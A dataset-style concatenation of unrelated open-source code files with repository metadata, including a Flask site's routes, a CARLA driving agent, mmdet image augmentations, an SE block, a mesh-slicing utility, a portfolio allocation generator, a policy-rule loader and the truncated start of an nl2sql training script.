] | 103 | 2015-01-01T08:31:41.000Z | 2022-02-14T06:17:58.000Z | ruddock/routes.py | mply/RuddockWebsite | 63f1f25da5bef842b5b2337592186f8e23c1803b | [
"MIT"
] | 8 | 2017-10-01T07:27:34.000Z | 2020-05-04T01:49:30.000Z | import flask
from ruddock import app
from ruddock.auth_utils import is_full_member
from ruddock.decorators import login_required
try:
from ruddock import secrets
except ImportError:
from ruddock import default_secrets as secrets
@app.route('/')
def home():
"""The homepage of the site."""
return flask.render_template('index.html')
@app.route('/info')
@login_required()
def show_info():
"""Shows info page on door combos, printers, etc."""
return flask.render_template('info.html',
full_member=is_full_member(flask.session['username']),
secrets=secrets)
@app.route('/contact')
def show_contact():
"""Shows Contact Us page."""
return flask.render_template('contact.html')
| 24.964286 | 58 | 0.74392 |
84e2a271582ba900a100ccd0e86332f612553fd7 | 10,106 | py | Python | team_code/geometric_fusion_agent.py | Kait0/leaderboard | e44c169d541832439f98c70b33cfe6f7d89dfa31 | [
"MIT"
] | 447 | 2021-03-26T09:29:17.000Z | 2022-03-30T03:03:35.000Z | leaderboard/team_code/geometric_fusion_agent.py | Kin-Zhang/mmfn | 48a4817c9fb8bcf6ecb068e4c969e6b0c1a1a438 | [
"MIT"
] | 56 | 2021-04-21T03:12:50.000Z | 2022-03-30T13:34:16.000Z | leaderboard/team_code/geometric_fusion_agent.py | Kin-Zhang/mmfn | 48a4817c9fb8bcf6ecb068e4c969e6b0c1a1a438 | [
"MIT"
] | 82 | 2021-04-14T04:34:04.000Z | 2022-03-29T07:35:15.000Z | import os
import json
import datetime
import pathlib
import time
import cv2
import carla
from collections import deque
import torch
import carla
import numpy as np
from PIL import Image
from leaderboard.autoagents import autonomous_agent
from geometric_fusion.model import GeometricFusion
from geometric_fusion.config import GlobalConfig
from geometric_fusion.data import *
from team_code.planner import RoutePlanner
SAVE_PATH = os.environ.get('SAVE_PATH', None)
def get_entry_point():
return 'GeometricFusionAgent'
class GeometricFusionAgent(autonomous_agent.AutonomousAgent):
def setup(self, path_to_conf_file):
self.track = autonomous_agent.Track.SENSORS
self.config_path = path_to_conf_file
self.step = -1
self.wall_start = time.time()
self.initialized = False
self.input_buffer = {'rgb': deque(), 'rgb_left': deque(), 'rgb_right': deque(),
'rgb_rear': deque(), 'lidar': deque(), 'gps': deque(), 'thetas': deque()}
self.config = GlobalConfig()
self.net = GeometricFusion(self.config, 'cuda')
self.net.load_state_dict(torch.load(os.path.join(path_to_conf_file, 'best_model.pth')))
self.net.cuda()
self.net.eval()
self.save_path = None
if SAVE_PATH is not None:
now = datetime.datetime.now()
string = pathlib.Path(os.environ['ROUTES']).stem + '_'
string += '_'.join(map(lambda x: '%02d' % x, (now.month, now.day, now.hour, now.minute, now.second)))
print (string)
self.save_path = pathlib.Path(os.environ['SAVE_PATH']) / string
self.save_path.mkdir(parents=True, exist_ok=False)
(self.save_path / 'rgb').mkdir(parents=True, exist_ok=False)
(self.save_path / 'meta').mkdir(parents=True, exist_ok=False)
def _init(self):
self._route_planner = RoutePlanner(4.0, 50.0)
self._route_planner.set_route(self._global_plan, True)
self.initialized = True
def _get_position(self, tick_data):
gps = tick_data['gps']
gps = (gps - self._route_planner.mean) * self._route_planner.scale
return gps
def sensors(self):
return [
{
'type': 'sensor.camera.rgb',
'x': 1.3, 'y': 0.0, 'z':2.3,
'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,
'width': 400, 'height': 300, 'fov': 100,
'id': 'rgb'
},
{
'type': 'sensor.camera.rgb',
'x': 1.3, 'y': 0.0, 'z':2.3,
'roll': 0.0, 'pitch': 0.0, 'yaw': -60.0,
'width': 400, 'height': 300, 'fov': 100,
'id': 'rgb_left'
},
{
'type': 'sensor.camera.rgb',
'x': 1.3, 'y': 0.0, 'z':2.3,
'roll': 0.0, 'pitch': 0.0, 'yaw': 60.0,
'width': 400, 'height': 300, 'fov': 100,
'id': 'rgb_right'
},
{
'type': 'sensor.camera.rgb',
'x': -1.3, 'y': 0.0, 'z':2.3,
'roll': 0.0, 'pitch': 0.0, 'yaw': -180.0,
'width': 400, 'height': 300, 'fov': 100,
'id': 'rgb_rear'
},
{
'type': 'sensor.lidar.ray_cast',
'x': 1.3, 'y': 0.0, 'z': 2.5,
'roll': 0.0, 'pitch': 0.0, 'yaw': -90.0,
'id': 'lidar'
},
{
'type': 'sensor.other.imu',
'x': 0.0, 'y': 0.0, 'z': 0.0,
'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,
'sensor_tick': 0.05,
'id': 'imu'
},
{
'type': 'sensor.other.gnss',
'x': 0.0, 'y': 0.0, 'z': 0.0,
'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,
'sensor_tick': 0.01,
'id': 'gps'
},
{
'type': 'sensor.speedometer',
'reading_frequency': 20,
'id': 'speed'
}
]
def tick(self, input_data):
self.step += 1
rgb = cv2.cvtColor(input_data['rgb'][1][:, :, :3], cv2.COLOR_BGR2RGB)
rgb_left = cv2.cvtColor(input_data['rgb_left'][1][:, :, :3], cv2.COLOR_BGR2RGB)
rgb_right = cv2.cvtColor(input_data['rgb_right'][1][:, :, :3], cv2.COLOR_BGR2RGB)
rgb_rear = cv2.cvtColor(input_data['rgb_rear'][1][:, :, :3], cv2.COLOR_BGR2RGB)
gps = input_data['gps'][1][:2]
speed = input_data['speed'][1]['speed']
compass = input_data['imu'][1][-1]
lidar = input_data['lidar'][1][:, :3]
result = {
'rgb': rgb,
'rgb_left': rgb_left,
'rgb_right': rgb_right,
'rgb_rear': rgb_rear,
'lidar': lidar,
'gps': gps,
'speed': speed,
'compass': compass,
}
pos = self._get_position(result)
result['gps'] = pos
next_wp, next_cmd = self._route_planner.run_step(pos)
result['next_command'] = next_cmd.value
theta = compass + np.pi/2
R = np.array([
[np.cos(theta), -np.sin(theta)],
[np.sin(theta), np.cos(theta)]
])
local_command_point = np.array([next_wp[0]-pos[0], next_wp[1]-pos[1]])
local_command_point = R.T.dot(local_command_point)
result['target_point'] = tuple(local_command_point)
return result
@torch.no_grad()
def run_step(self, input_data, timestamp):
if not self.initialized:
self._init()
tick_data = self.tick(input_data)
if self.step < self.config.seq_len:
rgb = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb'].append(rgb.to('cuda', dtype=torch.float32))
if not self.config.ignore_sides:
rgb_left = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_left']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_left'].append(rgb_left.to('cuda', dtype=torch.float32))
rgb_right = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_right']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_right'].append(rgb_right.to('cuda', dtype=torch.float32))
if not self.config.ignore_rear:
rgb_rear = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_rear']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_rear'].append(rgb_rear.to('cuda', dtype=torch.float32))
self.input_buffer['lidar'].append(tick_data['lidar'])
self.input_buffer['gps'].append(tick_data['gps'])
self.input_buffer['thetas'].append(tick_data['compass'])
control = carla.VehicleControl()
control.steer = 0.0
control.throttle = 0.0
control.brake = 0.0
return control
gt_velocity = torch.FloatTensor([tick_data['speed']]).to('cuda', dtype=torch.float32)
command = torch.FloatTensor([tick_data['next_command']]).to('cuda', dtype=torch.float32)
tick_data['target_point'] = [torch.FloatTensor([tick_data['target_point'][0]]),
torch.FloatTensor([tick_data['target_point'][1]])]
target_point = torch.stack(tick_data['target_point'], dim=1).to('cuda', dtype=torch.float32)
encoding = []
rgb = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb'].popleft()
self.input_buffer['rgb'].append(rgb.to('cuda', dtype=torch.float32))
if not self.config.ignore_sides:
rgb_left = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_left']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_left'].popleft()
self.input_buffer['rgb_left'].append(rgb_left.to('cuda', dtype=torch.float32))
rgb_right = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_right']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_right'].popleft()
self.input_buffer['rgb_right'].append(rgb_right.to('cuda', dtype=torch.float32))
if not self.config.ignore_rear:
rgb_rear = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_rear']), crop=self.config.input_resolution)).unsqueeze(0)
self.input_buffer['rgb_rear'].popleft()
self.input_buffer['rgb_rear'].append(rgb_rear.to('cuda', dtype=torch.float32))
self.input_buffer['lidar'].popleft()
self.input_buffer['lidar'].append(tick_data['lidar'])
self.input_buffer['gps'].popleft()
self.input_buffer['gps'].append(tick_data['gps'])
self.input_buffer['thetas'].popleft()
self.input_buffer['thetas'].append(tick_data['compass'])
lidar_processed = list()
bev_points = list()
cam_points = list()
# transform the lidar point clouds to local coordinate frame
ego_theta = self.input_buffer['thetas'][-1]
ego_x, ego_y = self.input_buffer['gps'][-1]
for i, lidar_point_cloud in enumerate(self.input_buffer['lidar']):
curr_theta = self.input_buffer['thetas'][i]
curr_x, curr_y = self.input_buffer['gps'][i]
lidar_point_cloud[:,1] *= -1 # inverts x, y
lidar_transformed_np = transform_2d_points(lidar_point_cloud,
np.pi/2-curr_theta, -curr_x, -curr_y, np.pi/2-ego_theta, -ego_x, -ego_y)
lidar_transformed = torch.from_numpy(lidar_to_histogram_features(lidar_transformed_np, crop=self.config.input_resolution)).unsqueeze(0)
lidar_processed.append(lidar_transformed.to('cuda', dtype=torch.float32))
curr_bev_points, curr_cam_points = lidar_bev_cam_correspondences(lidar_transformed_np, crop=self.config.input_resolution)
bev_points.append(torch.from_numpy(curr_bev_points).unsqueeze(0))
cam_points.append(torch.from_numpy(curr_cam_points).unsqueeze(0))
bev_points = bev_points[0].long().to('cuda', dtype=torch.int64)
cam_points = cam_points[0].long().to('cuda', dtype=torch.int64)
pred_wp = self.net(self.input_buffer['rgb'] + self.input_buffer['rgb_left'] + \
self.input_buffer['rgb_right']+self.input_buffer['rgb_rear'], \
lidar_processed, target_point, gt_velocity, bev_points, cam_points)
steer, throttle, brake, metadata = self.net.control_pid(pred_wp, gt_velocity)
self.pid_metadata = metadata
if brake < 0.05: brake = 0.0
if throttle > brake: brake = 0.0
control = carla.VehicleControl()
control.steer = float(steer)
control.throttle = float(throttle)
control.brake = float(brake)
if SAVE_PATH is not None and self.step % 10 == 0:
self.save(tick_data)
return control
def save(self, tick_data):
frame = self.step // 10
Image.fromarray(tick_data['rgb']).save(self.save_path / 'rgb' / ('%04d.png' % frame))
outfile = open(self.save_path / 'meta' / ('%04d.json' % frame), 'w')
json.dump(self.pid_metadata, outfile, indent=4)
outfile.close()
def destroy(self):
del self.net
| 35.090278 | 143 | 0.671581 |
ba88aa279e0c9d9fc77b828de5aac0f42e7676cf | 5,625 | py | Python | mmdet/datasets/extra_aug.py | daniel616/DL | b62087bb86bcfa4cdaa692bb0ae724d416761de3 | [
"Apache-2.0"
] | 2 | 2020-03-22T14:27:38.000Z | 2020-06-20T02:35:14.000Z | mmdet/datasets/extra_aug.py | daniel616/DL | b62087bb86bcfa4cdaa692bb0ae724d416761de3 | [
"Apache-2.0"
] | null | null | null | mmdet/datasets/extra_aug.py | daniel616/DL | b62087bb86bcfa4cdaa692bb0ae724d416761de3 | [
"Apache-2.0"
] | null | null | null | import mmcv
import numpy as np
from numpy import random
from mmdet.core.evaluation.bbox_overlaps import bbox_overlaps
class PhotoMetricDistortion(object):
def __init__(self,
brightness_delta=32,
contrast_range=(0.5, 1.5),
saturation_range=(0.5, 1.5),
hue_delta=18):
self.brightness_delta = brightness_delta
self.contrast_lower, self.contrast_upper = contrast_range
self.saturation_lower, self.saturation_upper = saturation_range
self.hue_delta = hue_delta
def __call__(self, img, boxes, labels):
# random brightness
if random.randint(2):
delta = random.uniform(-self.brightness_delta,
self.brightness_delta)
img += delta
# mode == 0 --> do random contrast first
# mode == 1 --> do random contrast last
mode = random.randint(2)
if mode == 1:
if random.randint(2):
alpha = random.uniform(self.contrast_lower,
self.contrast_upper)
img *= alpha
# convert color from BGR to HSV
img = mmcv.bgr2hsv(img)
# random saturation
if random.randint(2):
img[..., 1] *= random.uniform(self.saturation_lower,
self.saturation_upper)
# random hue
if random.randint(2):
img[..., 0] += random.uniform(-self.hue_delta, self.hue_delta)
img[..., 0][img[..., 0] > 360] -= 360
img[..., 0][img[..., 0] < 0] += 360
# convert color from HSV to BGR
img = mmcv.hsv2bgr(img)
# random contrast
if mode == 0:
if random.randint(2):
alpha = random.uniform(self.contrast_lower,
self.contrast_upper)
img *= alpha
# randomly swap channels
if random.randint(2):
img = img[..., random.permutation(3)]
return img, boxes, labels
class Expand(object):
def __init__(self, mean=(0, 0, 0), to_rgb=True, ratio_range=(1, 4)):
if to_rgb:
self.mean = mean[::-1]
else:
self.mean = mean
self.min_ratio, self.max_ratio = ratio_range
def __call__(self, img, boxes, labels):
if random.randint(2):
return img, boxes, labels
h, w, c = img.shape
ratio = random.uniform(self.min_ratio, self.max_ratio)
expand_img = np.full((int(h * ratio), int(w * ratio), c),
self.mean).astype(img.dtype)
left = int(random.uniform(0, w * ratio - w))
top = int(random.uniform(0, h * ratio - h))
expand_img[top:top + h, left:left + w] = img
img = expand_img
boxes += np.tile((left, top), 2)
return img, boxes, labels
class RandomCrop(object):
def __init__(self, min_ious=(0.1, 0.3, 0.5, 0.7, 0.9), min_crop_size=0.3):
# 1: return ori img
self.sample_mode = (1, *min_ious, 0)
self.min_crop_size = min_crop_size
def __call__(self, img, boxes, labels):
h, w, c = img.shape
while True:
mode = random.choice(self.sample_mode)
if mode == 1:
return img, boxes, labels
min_iou = mode
for i in range(50):
new_w = random.uniform(self.min_crop_size * w, w)
new_h = random.uniform(self.min_crop_size * h, h)
# h / w in [0.5, 2]
if new_h / new_w < 0.5 or new_h / new_w > 2:
continue
left = random.uniform(w - new_w)
top = random.uniform(h - new_h)
patch = np.array((int(left), int(top), int(left + new_w),
int(top + new_h)))
overlaps = bbox_overlaps(
patch.reshape(-1, 4), boxes.reshape(-1, 4)).reshape(-1)
if overlaps.min() < min_iou:
continue
# center of boxes should inside the crop img
center = (boxes[:, :2] + boxes[:, 2:]) / 2
mask = (center[:, 0] > patch[0]) * (
center[:, 1] > patch[1]) * (center[:, 0] < patch[2]) * (
center[:, 1] < patch[3])
if not mask.any():
continue
boxes = boxes[mask]
labels = labels[mask]
# adjust boxes
img = img[patch[1]:patch[3], patch[0]:patch[2]]
boxes[:, 2:] = boxes[:, 2:].clip(max=patch[2:])
boxes[:, :2] = boxes[:, :2].clip(min=patch[:2])
boxes -= np.tile(patch[:2], 2)
return img, boxes, labels
class Rotate():
pass
class ExtraAugmentation(object):
def __init__(self,
photo_metric_distortion=None,
expand=None,
random_crop=None):
self.transforms = []
if photo_metric_distortion is not None:
self.transforms.append(
PhotoMetricDistortion(**photo_metric_distortion))
if expand is not None:
self.transforms.append(Expand(**expand))
if random_crop is not None:
self.transforms.append(RandomCrop(**random_crop))
def __call__(self, img, boxes, labels):
img = img.astype(np.float32)
for transform in self.transforms:
img, boxes, labels = transform(img, boxes, labels)
return img, boxes, labels
| 33.885542 | 78 | 0.510756 |
4344bf84902ac046295d960da163cb68fcc97210 | 1,705 | py | Python | ntire2021/models/senet.py | solcummings/ntire2021-sar | 25d60874632135daf39805837b850bba46c3f3a5 | [
"Apache-2.0"
] | null | null | null | ntire2021/models/senet.py | solcummings/ntire2021-sar | 25d60874632135daf39805837b850bba46c3f3a5 | [
"Apache-2.0"
] | null | null | null | ntire2021/models/senet.py | solcummings/ntire2021-sar | 25d60874632135daf39805837b850bba46c3f3a5 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
from models.model_base import InitializationMixin
class SENet(nn.Module, InitializationMixin):
"""
SENet from arXiv:1709.01507 Squeeze-and-Excitation Networks
Notes
-----
Related papers
Spatial SE arXiv:1803.02579 Concurrent Spatial and Channel Squeeze & Excitation in
Fully Convolutional Networks
"""
def __init__(self, classes, img_channels, model_depth, arch_config=None,
pretrained=False):
super().__init__()
pass
def forward(self, x):
pass
class SEBlock(nn.Module):
def __init__(self, in_channels, mid_channels, act=nn.ReLU(inplace=True),
sigmoid=nn.Sigmoid(), **kwargs):
super().__init__()
self.in_channels = in_channels
self.mid_channels = mid_channels
self.out_channels = in_channels
self.block = self.__configure(act, sigmoid)
def forward(self, x):
out = self.block(x)
return out * x
def __configure(self, act, sigmoid):
# "Removing the biases of the FC layers in the excitation operation
# facilitates the modelling of channel dependencies..." p.8
se_block = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(self.in_channels, self.mid_channels, 1, bias=True),
act,
nn.Conv2d(self.mid_channels, self.out_channels, 1, bias=True),
sigmoid,
)
return se_block
if __name__ == '__main__':
torch.manual_seed(0)
se_block = SEBlock(64, 64 // 16, act=torch.nn.ReLU6(inplace=True))
x = torch.ones(1, 64, 32, 32)
out = se_block(x)
print(out)
print(out.shape)
| 27.95082 | 86 | 0.628739 |
678aa82788b96892d585cbcfea4bbbc98bdb75ef | 3,185 | py | Python | xray/slice.py | jtgrassel/xray | 684860bc268d7475a07f4754a4ec9c03889e4d68 | [
"MIT"
] | null | null | null | xray/slice.py | jtgrassel/xray | 684860bc268d7475a07f4754a4ec9c03889e4d68 | [
"MIT"
] | null | null | null | xray/slice.py | jtgrassel/xray | 684860bc268d7475a07f4754a4ec9c03889e4d68 | [
"MIT"
] | 3 | 2021-08-14T12:20:26.000Z | 2021-09-21T21:05:58.000Z | import math
import numpy as np
def manhattan_distance(p1, p2, d=2):
assert (len(p1) == len(p2))
all_distance = 0
for i in range(d):
all_distance += abs(p1[i] - p2[i])
return all_distance
def to_intersecting_lines(mesh, height):
# find relevant triangles
mask = np.zeros(len(mesh))
z_val = mesh[:, 2::3]
above = z_val > height
below = z_val < height
same = z_val == height
row_sum = same.sum(axis=1)
mask[row_sum == 3] = 1
mask[row_sum == 2] = 1
mask[np.any(above, axis=1) & np.any(below, axis=1)] = 1
# find intersecting triangles
not_same_triangles = mesh[mask.astype(np.bool) & ~np.all(same, axis=1)].reshape(-1, 3, 3)
# TODO: Make the following line faster
lines = list(map(lambda tri: triangle_to_intersecting_lines(tri, height), not_same_triangles))
return lines
def draw_line_on_pixels(p1, p2, pixels):
line_steps = math.ceil(manhattan_distance(p1, p2))
if line_steps == 0:
pixels[int(p1[0]), int(p2[1])] = True
return
for j in range(line_steps + 1):
point = linear_interpolation(p1, p2, j / line_steps)
pixels[int(point[0]), int(point[1])] = True
def linear_interpolation(p1, p2, distance):
'''
:param p1: Point 1
:param p2: Point 2
:param distance: Between 0 and 1, Lower numbers return points closer to p1.
:return: A point on the line between p1 and p2
'''
slopex = (p1[0] - p2[0])
slopey = (p1[1] - p2[1])
slopez = p1[2] - p2[2]
return (
p1[0] - distance * slopex,
p1[1] - distance * slopey,
p1[2] - distance * slopez
)
def triangle_to_intersecting_lines(triangle, height):
assert (len(triangle) == 3)
above = triangle[triangle[:, 2] > height]
below = triangle[triangle[:, 2] < height]
same = triangle[triangle[:, 2] == height]
assert len(same) != 3
if len(same) == 2:
return same[0], same[1]
elif len(same) == 1:
side1 = where_line_crosses_z(above[0], below[0], height)
return side1, same[0]
else:
lines = []
for a in above:
for b in below:
lines.append((b, a))
side1 = where_line_crosses_z(lines[0][0], lines[0][1], height)
side2 = where_line_crosses_z(lines[1][0], lines[1][1], height)
return side1, side2
def where_line_crosses_z(p1, p2, z):
if p1[2] > p2[2]:
t = p1
p1 = p2
p2 = t
# now p1 is below p2 in z
if p2[2] == p1[2]:
distance = 0
else:
distance = (z - p1[2]) / (p2[2] - p1[2])
return linear_interpolation(p1, p2, distance)
# Depricated
def calculate_scale_shift(mesh, resolution):
all_points = mesh.reshape(-1, 3)
mins = all_points.min(axis=0)
maxs = all_points.max(axis=0)
del all_points
shift = -1 * mins
xy_scale = float(resolution - 1) / (max(maxs[0] - mins[0], maxs[1] - mins[1]))
# TODO: Change this to return one scale. If not, verify svx exporting still works.
scale = [xy_scale, xy_scale, xy_scale]
bounding_box = [resolution, resolution, math.ceil((maxs[2] - mins[2]) * xy_scale)]
return scale, shift, bounding_box
| 30.333333 | 98 | 0.600314 |
a7532beb454de9fdc73c8fd567ef6b46a0f5b32f | 999 | py | Python | tests/unit/test_scriptgenerator.py | tksn/phoneauto | 9b92226c5c5eeb606f4b3c462a8b654454eb203d | [
"MIT"
] | null | null | null | tests/unit/test_scriptgenerator.py | tksn/phoneauto | 9b92226c5c5eeb606f4b3c462a8b654454eb203d | [
"MIT"
] | null | null | null | tests/unit/test_scriptgenerator.py | tksn/phoneauto | 9b92226c5c5eeb606f4b3c462a8b654454eb203d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from mock import Mock
from phoneauto.scriptgenerator import scriptgenerator
def create_scriptgenerator():
d = Mock()
d.get_screenshot_as_file = Mock()
f = Mock()
f.find_object_contains = Mock()
conf = {
'devices': [d],
'coder': Mock(),
'finder': f,
'writer': Mock()
}
return scriptgenerator.ScriptGenerator(conf)
def test_get_screenshot():
g = create_scriptgenerator()
g.devices[0].get_screenshot_as_file.return_value = False
assert g.execute('get_screenshot') is None
def test_swipe_object_with_horiz_direction():
g = create_scriptgenerator()
g.execute('swipe_object_with_direction', {
'start': (0, 0), 'end': (0, 30)
})
_, findobj_kwargs = g.finder.find_object_contains.call_args
_, swipe_kwargs = g.devices[0].swipe_object.call_args
assert findobj_kwargs['coord'] == (0, 0)
assert swipe_kwargs['direction'] == 'down'
| 27 | 63 | 0.66967 |
17b1b72000da4f244e949e8f4c906de1d176c084 | 3,425 | py | Python | mockportfolio/holdings.py | smacken/mockportfolio | bb7ef73ba19be52e22adf5b22e30fd1e9e0e585f | [
"MIT"
] | null | null | null | mockportfolio/holdings.py | smacken/mockportfolio | bb7ef73ba19be52e22adf5b22e30fd1e9e0e585f | [
"MIT"
] | 297 | 2019-10-21T17:26:33.000Z | 2021-07-19T17:19:23.000Z | mockportfolio/holdings.py | smacken/trading-mock-portfolio | bb7ef73ba19be52e22adf5b22e30fd1e9e0e585f | [
"MIT"
] | null | null | null | '''holdings generator'''
import pandas as pd
from pypfopt.efficient_frontier import EfficientFrontier
from pypfopt import risk_models
from pypfopt import expected_returns
from pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices
from .prices import Prices
class Holdings(object):
''' trading holdings generator '''
def __init__(self, data_path='data/'):
self.data_path = data_path
def generate(self, total=10000, start='2017-01-09', end='2018-12-27'):
''' generate holdings history frame '''
p = Prices(self.data_path)
portfolio = self.portfolio(start)
holding_folio = {}
months = [p.next_weekday(x).strftime('%Y-%m-%d') for x in p.monthlist([start, end])]
months.append(end)
for month in months:
''' rebalance portfolio /adjust holdings'''
price_pivot = portfolio.loc[start:month]
if len(price_pivot.index) < 10:
continue
allocation = self.build_portfolio(price_pivot, total)
holding_folio[month] = allocation
return holding_folio
def listings(self):
''' get a dataframe of all listed tickers '''
df = pd.read_csv(f'{self.data_path}ASXListedCompanies.csv', skiprows=[0, 1])
df.rename(
columns={
'Company name': 'Name',
'ASX code': 'Tick',
'GICS industry group': 'Industry'
}, inplace=True)
return df
def random_ticks(self, tickers, tick_count=10):
''' get a list of random tickers from the listings '''
df = tickers.sample(n=tick_count)
return df
def build_portfolio(self, price_pivot, portfolio_total=10000):
''' build a portfolio from price data'''
mu = expected_returns.mean_historical_return(price_pivot)
shrink = risk_models.CovarianceShrinkage(price_pivot)
S = shrink.ledoit_wolf()
ef = EfficientFrontier(mu, S, weight_bounds=(0, 0.2), gamma=0.8)
weights = ef.max_sharpe()
weights = ef.clean_weights()
latest_prices = get_latest_prices(price_pivot)
weights = {k: v for k, v in weights.items() if weights[k] > 0.0}
da = DiscreteAllocation(weights, latest_prices, total_portfolio_value=portfolio_total)
allocation, leftover = da.lp_portfolio()
# print("Discrete allocation:", allocation)
return allocation
def portfolio(self, date_start, portfolio_size=10):
''' build a random portfolio of prices, presented in pivot '''
ticks = self.random_ticks(self.listings())
prices = Prices(self.data_path)
tick_prices = prices.update(ticks.Tick.values, date_start)
tick_prices = tick_prices[tick_prices.Tick.isin(ticks.Tick.values.tolist())]
tickers = tick_prices.Tick.unique()
if len(tickers) < portfolio_size:
# add additional random ticks
remaining = portfolio_size - len(tickers)
additional = self.random_ticks(self.listings(), remaining)
add_prices = prices.update(additional.Tick.values, date_start)
add_prices = add_prices[add_prices.Tick.isin(additional.Tick.values.tolist())]
tick_prices = pd.concat([tick_prices, add_prices])
pass
price_pivot = tick_prices.pivot(index='Date', columns='Tick', values='Close')
return price_pivot
| 42.8125 | 94 | 0.645255 |
a8e107a7d749b8d5977393ece0712ad1afdb031e | 4,643 | py | Python | src/ion/process/bootstrap/load_system_policy.py | scionrep/scioncc_new | 086be085b69711ee24c4c86ed42f2109ca0db027 | [
"BSD-2-Clause"
] | 2 | 2015-10-05T20:36:35.000Z | 2018-11-21T11:45:24.000Z | src/ion/process/bootstrap/load_system_policy.py | scionrep/scioncc_new | 086be085b69711ee24c4c86ed42f2109ca0db027 | [
"BSD-2-Clause"
] | 21 | 2015-03-18T14:39:32.000Z | 2016-07-01T17:16:29.000Z | src/ion/process/bootstrap/load_system_policy.py | scionrep/scioncc_new | 086be085b69711ee24c4c86ed42f2109ca0db027 | [
"BSD-2-Clause"
] | 12 | 2015-03-18T10:53:49.000Z | 2018-06-21T11:19:57.000Z | #!/usr/bin/env python
"""Process that loads the system policy"""
__author__ = 'Stephen P. Henrie, Michael Meisinger'
import os
import yaml
from pyon.core.exception import ContainerConfigError
from pyon.core.governance import get_system_actor, get_system_actor_header
from pyon.public import CFG, log, ImmediateProcess, IonObject, RT, OT, BadRequest
from interface.services.core.iorg_management_service import OrgManagementServiceProcessClient
from interface.services.core.ipolicy_management_service import PolicyManagementServiceProcessClient
class LoadSystemPolicy(ImmediateProcess):
"""
bin/pycc -x ion.process.bootstrap.load_system_policy.LoadSystemPolicy op=load
"""
def on_init(self):
pass
def on_start(self):
op = self.CFG.get("op", None)
log.info("LoadSystemPolicy: {op=%s}" % op)
if op:
if op == "load":
self.op_load_system_policies(self)
else:
raise BadRequest("Operation unknown")
else:
raise BadRequest("No operation specified")
def on_quit(self):
pass
@classmethod
def op_load_system_policies(cls, calling_process):
"""
Create the initial set of policy rules for the system.
To establish clear rule precedence, denying all anonymous access to Org services first
and then add rules which Permit access to specific operations based on conditions.
"""
orgms_client = OrgManagementServiceProcessClient(process=calling_process)
policyms_client = PolicyManagementServiceProcessClient(process=calling_process)
ion_org = orgms_client.find_org()
system_actor = get_system_actor()
log.info('System actor: %s', system_actor._id)
sa_user_header = get_system_actor_header(system_actor)
policy_rules_filename = calling_process.CFG.get_safe("bootstrap.initial_policy_rules")
if not policy_rules_filename:
raise ContainerConfigError("Policy rules file not configured")
if not os.path.exists(policy_rules_filename):
raise ContainerConfigError("Policy rules file does not exist")
with open(policy_rules_filename, "r") as f:
policy_rules_yml = f.read()
policy_rules_cfg = yaml.safe_load(policy_rules_yml)
if "type" not in policy_rules_cfg or policy_rules_cfg["type"] != "scioncc_policy_rules":
raise ContainerConfigError("Invalid policy rules file content")
log.info("Loading %s policy rules", len(policy_rules_cfg["rules"]))
for rule_cfg in policy_rules_cfg["rules"]:
rule_name, policy_type, rule_desc = rule_cfg["name"], rule_cfg["policy_type"], rule_cfg.get("description", "")
if rule_cfg.get("enable") is False:
log.info("Policy rule %s disabled", rule_name)
continue
log.info("Loading policy rule %s (%s)", rule_name, policy_type)
rule_filename = rule_cfg["rule_def"]
if not os.path.isabs(rule_filename):
rule_filename = os.path.join(os.path.dirname(policy_rules_filename), rule_filename)
with open(rule_filename, "r") as f:
rule_def = f.read()
ordinal = rule_cfg.get("ordinal", 0)
# Create the policy
if policy_type == "common_service_access":
policyms_client.create_common_service_access_policy(rule_name, rule_desc, rule_def, ordinal=ordinal,
headers=sa_user_header)
elif policy_type == "service_access":
service_name = rule_cfg["service_name"]
policyms_client.create_service_access_policy(service_name, rule_name, rule_desc, rule_def,
ordinal=ordinal, headers=sa_user_header)
elif policy_type == "resource_access":
resource_type, resource_name = rule_cfg["resource_type"], rule_cfg["resource_name"]
res_ids, _ = calling_process.container.resource_registry.find_resources(
restype=resource_type, name=resource_name, id_only=True)
if res_ids:
resource_id = res_ids[0]
policyms_client.create_resource_access_policy(resource_id, rule_name, rule_desc, rule_def,
ordinal=ordinal, headers=sa_user_header)
else:
raise ContainerConfigError("Rule %s has invalid policy type: %s" % (rule_name, policy_type))
| 46.89899 | 122 | 0.647211 |
8cbccc07b49fdc8c4d54c69cf1b646e8841d507c | 4,514 | py | Python | train.py | hatrix233/nl2sql_baseline | e1dc59385932b325569f127df7b27e9fdb1d63da | [
"BSD-3-Clause"
] | 340 | 2019-06-10T09:49:39.000Z | 2022-03-19T16:17:49.000Z | train.py | hatrix233/nl2sql_baseline | e1dc59385932b325569f127df7b27e9fdb1d63da | [
"BSD-3-Clause"
] | 11 | 2019-06-10T12:31:48.000Z | 2021-04-25T01:40:09.000Z | train.py | hatrix233/nl2sql_baseline | e1dc59385932b325569f127df7b27e9fdb1d63da | [
"BSD-3-Clause"
] | 116 | 2019-06-10T09:40:40.000Z | 2021-10-09T07:30:53.000Z | import torch
from sqlnet.utils import *
from sqlnet.model.sqlnet import SQLNet
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--bs', type=int, default=16, help='Batch size')
